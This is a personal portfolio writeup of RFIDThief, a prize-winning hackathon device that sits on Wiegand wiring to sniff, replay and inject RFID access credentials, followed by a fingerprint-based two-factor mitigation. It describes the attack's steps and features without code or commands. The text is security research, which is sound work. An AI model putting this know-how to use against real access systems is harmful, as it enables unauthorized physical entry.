// daniel gorbunov
RFIDThief

RFIDThief

Man-in-the-middle device for attacking RFID access control systems

2022Security ResearchEmbedded SystemsGitHub
Heads Up!

This writeup is a work in progress. I will be updating it with more details in the coming months.

Overview

RFIDThief is a man-in-the-middle attack device designed to expose vulnerabilities in widely used RFID access control systems. Built during the 36-hour HackUMass X hackathon in November 2022, the device demonstrates critical security flaws in the Wiegand protocol — a communication standard used in most RFID access control systems. Wiegand has long been documented as being insecure, and vendors of installations with particularly high security requirements recommend using newer protocols like OSDP.

The project was developed in collaboration with John Dale and won first place at HackUMass X in 2022.

The Vulnerability

The Wiegand protocol, despite its widespread adoption, has a fundamental security flaw: data is transmitted in plaintext between the RFID reader and the access control panel. There is no encryption, no authentication, and no integrity checking.

This means anyone with physical access to the wiring between a reader and its controller can:

  • Sniff credentials as users scan their cards
  • Replay captured credentials to gain unauthorized access
  • Inject arbitrary data to unlock doors
  • Deny service by flooding the controller with invalid data

How It Works

RFIDThief sits between the RFID reader and the access control panel, intercepting all Wiegand communications. The device uses bit-banging to decode the protocol in real-time.

When a legitimate user scans their RFID card:

  1. The reader extracts the card's unique ID
  2. RFIDThief intercepts the Wiegand signal before it reaches the controller
  3. The credential is logged and can be replayed later
  4. The original ID is forwarded to the controller (optional)

The attacker can then replay the captured credential at any time to gain access without possessing the original card.

Features

  • Credential Sniffing: Capture RFID card data in real-time
  • Replay Attacks: Store and replay captured credentials on demand
  • Denial of Service: Flood the controller to disable the access system
  • Cloud Integration: Send captured data to a remote server for analysis
  • Graphical User Interface: Display captured RFID IDs in real-time
  • Configurable Modes: Toggle between passive sniffing and active attack modes

Two-Factor Mitigation

To demonstrate how these vulnerabilities can be mitigated, we implemented a two-factor authentication system using a fingerprint reader. The fingerprint sensor operates on a completely separate circuit, sending verification data to the cloud independently of the RFID system.

This physical separation means that even if an attacker compromises the Wiegand connection, they cannot bypass the biometric verification — both factors must authenticate through independent channels.

Recognition

  • 1st Place at HackUMass X (November 2022)
  • $500 Grant from the Berthiaume Center for Entrepreneurship for further development
  • Featured in UMass Engineering News
  • Featured in UMass CICS News